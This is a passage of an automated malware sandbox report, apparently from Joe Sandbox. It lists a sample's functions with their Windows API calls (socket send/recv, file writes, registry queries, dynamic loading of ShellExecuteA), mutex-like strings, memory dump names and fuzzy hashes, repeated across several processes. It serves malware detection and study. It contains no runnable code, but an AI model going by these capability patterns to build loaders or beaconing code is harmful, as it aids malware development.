                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128834E
                                                                                                                                                                                                                                      • Part of subcall function 01287C4E: socket.WS2_32(00000002,00000001,00000006), ref: 01287C83
                                                                                                                                                                                                                                    • send.WS2_32(00000000,00000000,00000008,00000000), ref: 01288389
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: GlobalAlloc.KERNEL32(00000040,-00000C00), ref: 012881A1
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: recv.WS2_32(?,00000008,00000400,00000000), ref: 012881F0
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: GlobalFree.KERNEL32(00000000), ref: 01288247
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: closesocket.WS2_32(000000FF), ref: 01288283
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 012883BE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1332007968-0
                                                                                                                                                                                                                                    • Opcode ID: ed22ad436a89bf41b45a52553dec426664d0afc0e58596d72b05cc50f83aebd6
                                                                                                                                                                                                                                    • Instruction ID: c0252f98fad0d6a32cb54f05a2e4ee14f5d9454096125141d6767f17d1bf8bbb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed22ad436a89bf41b45a52553dec426664d0afc0e58596d72b05cc50f83aebd6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56219F71D112199BEB20DB78DC0ABEDB7B5BF44300F0446E9E20CE62D1EB744A959F51
                                                                                                                                                                                                                                    Function 012845D2 Relevance: 6.0, APIs: 4, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 012845E3
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000020,00000000), ref: 012845FC
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0128461D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 01284627
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateDeleteHandleWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 656945655-0
                                                                                                                                                                                                                                    • Opcode ID: eea1a4f8bdf54f36c89f02b4f8959e111913caabc134eb71aaf6e19eb69519fd
                                                                                                                                                                                                                                    • Instruction ID: c3c28bd3d3a21dace8723da2ae6eeda0d85d3b163f0e2345d97a2a5cb803b51a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eea1a4f8bdf54f36c89f02b4f8959e111913caabc134eb71aaf6e19eb69519fd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F012B5640308FBDB20DFE4EC4DF9E7B78AB48711F108684FA05AB2D4D670AA549B50
                                                                                                                                                                                                                                    Function 01287FA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 012880DA
                                                                                                                                                                                                                                    • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 012880F5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: recvselect
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 741273618-2766056989
                                                                                                                                                                                                                                    • Opcode ID: b52e1ad9f8bf59aac751911893ed6ef94c84b0958f445a767e52f9e193536ce3
                                                                                                                                                                                                                                    • Instruction ID: 6c59c8b2a326ecaefdc4e019c3b75e62ad29838ca3a123c8df87c5b4767d9426
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52e1ad9f8bf59aac751911893ed6ef94c84b0958f445a767e52f9e193536ce3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20413870A1121CDBEB29DF08C891BEDB7B5AF94304F508099E609A7280CBB46EC1CF91
                                                                                                                                                                                                                                    Function 0128511E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285153
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0128518F
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 012851D1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128543A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValue$Closewsprintf
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3301640424-3143526458
                                                                                                                                                                                                                                    • Opcode ID: 11f12f59815a10cfbd9c37a4f40d8a94c1e4d30f868d87954c36d63f12e29678
                                                                                                                                                                                                                                    • Instruction ID: a3344363aeb22d46dc6ef3a97b1ce7ae876ce64286da9c0fa57b13d4204a6aaa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11f12f59815a10cfbd9c37a4f40d8a94c1e4d30f868d87954c36d63f12e29678
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF049719221289BDB30EB54DD84FE9F378FB54705F0841D8F629A6184CB32ABA8CF54

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02410005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: bf585241f81259111fae959ba8dbdfb80536dd17e6700cac6013d8a8c563a66b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC617E71640288ABEF11DF60CC48FEA3768EB04705F041516EE09BE2E0D7B5A684CB5E
                                                                                                                                                                                                                                    Function 024106D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: d1e73c8610792a9a3e156b6f8460262f42bb90fff4ba61d025b97f7167c933e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4B14871A002898FEF10CF64CD44BAA37A5FF54304F485926DD0DAF3A1D375AA95CB4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02410260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 277bba1b1824b6642ad0161d91f834ac07e413a2f6b2ed87ea8b722040acf028
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E111E31240388ABEF15DEA08D4DFEA37A8AB44B05F045415BE09EE1E0DBB19644872B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02290005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 4848a519640b09f7fda90544f4e52f883db83ce0b3dbcfe0681fef718d908128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5361477165038DABEF10DFA0CC89FAA3769EB04B05F440515EE09BE1F4D7B1A7448B6A
                                                                                                                                                                                                                                    Function 022906D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: feb9bcb35e72d87f2bce88f93b2dc91b0d0647a05ee87e375b209279c9b663a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04B11971A1028E8FEF10CF64CC44BE937A5FF44314F484925DD09AF2A5D376AA94CB8A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02290260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: bb8fd5b6784410119b57dc3540630429bd7e0afb706686ed328c6c9965dedbe9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57111B31650289ABEF10DEE08D4DFED37A8AB84B05F040414BA09EE0E4DBB19344872B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00950005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 56eabf399a8e181e28e5dc21f5c89752777b8ecd54d50d5b662413c3927b29c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3616F71644388ABEF10DF61CC49FEA3768EF84702F544515EE09BE1E0D6B1A648CB5B
                                                                                                                                                                                                                                    Function 009506D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 53ea117c908828f6be91ff605c26371c1ac0229357233d4f6c995be8296cb5d5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CB14C71A002898FEF10CF25CC44BA937A9FF84305F484925DD0DAF2A1D375AA98CF4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00950260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 9c30e61e26d3b271ce6cddbdbac14861d2e7fb87b2a36a44560fd2c3f3acc363
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63111E31244288ABEF10DEA18D4DFD937ACAB84B02F040414BE09EE0E0DAB19644872B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00BF0005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: f6fb469f49f4b2f5520c19507104f0ce156ecaa7301f3e97654670511a8fb881
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA615E7165028CABEF10EF60CC89FAA37A8EB04701F544555FF09BF1F1D6B156488B6A
                                                                                                                                                                                                                                    Function 00BF06D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: f21209ab260277400cb49d672948d7085ffb39f1bcdcfac83583043ccb3889b2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB12C71A1028D8FEF10EF14CC44BA937E5FF44304F4849A5DD09AF2A2D375AA98CB4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00BF0260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: d10906f3b958b7bf630708f43ee79f820ebdfc47fd4549e7dc93893a596fe42d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0111E71250288ABEF10EEA08D4DFED37A8EF44B01F040414BB09EE0E1DAB19644873B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00340005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 74111f3679427098ce90a7b62af0f61459f5e0f102ab7d17c25d68f679424c1f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A615E71740288ABEF16DFA0CC49FEA37A8EB04701F550915EF09BF1F0D6B166448B5A
                                                                                                                                                                                                                                    Function 003406D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: d9b3289aa44f258d5103b908aef39f7fa3301f30d1e6178c9f73ce1b67587242
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72B12531A002898FEB15CF24CD84BA93BE5FF44304F494925DE49AF6A1D375BA94CF4A

                                                                                                                                                                                                                                    Non-executed Functions

